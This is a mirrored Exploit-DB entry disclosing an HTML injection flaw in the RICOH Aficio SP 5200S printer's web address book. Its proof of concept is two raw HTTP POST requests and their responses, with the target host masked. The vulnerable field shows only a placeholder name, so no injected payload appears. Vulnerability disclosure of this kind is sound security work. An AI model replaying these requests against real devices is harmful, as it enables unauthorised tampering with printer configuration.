bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/48161.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

73 lines
No EOL
3.4 KiB
Text
Raw Permalink Blame History

# Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
# Discovery by: Paulina Girón
# Discovery Date: 2020-03-02
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re2/model/sp52s/sp52s.htm
# Product Version: RICOH Aficio SP 5200S Printer
# Vulnerability Type: Code Injection - HTML Injection
# Steps to Produce the HTML Injection:
#1.- HTTP POST Request 'adrsGetUser.cgi':
POST /web/entry/es/address/adrsGetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 447
Cache-Control: max-age=0
Origin: http://xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsList.cgi
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
Connection: close
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=13&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00005=ADRS_ENTRY_USER&00006=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00009=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 15:15:59 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 15:15:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
#2.- HTTP POST Request 'adrsSetUser.cgi':
POST /web/entry/es/address/adrsSetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 611
Cache-Control: max-age=0
Origin: http://xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsGetUser.cgi
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
Connection: close
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00012&entryNameIn=prueba&entryDisplayNameIn=prueba&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 15:17:10 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 15:17:10 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
Reference in a new issue View git blame Copy permalink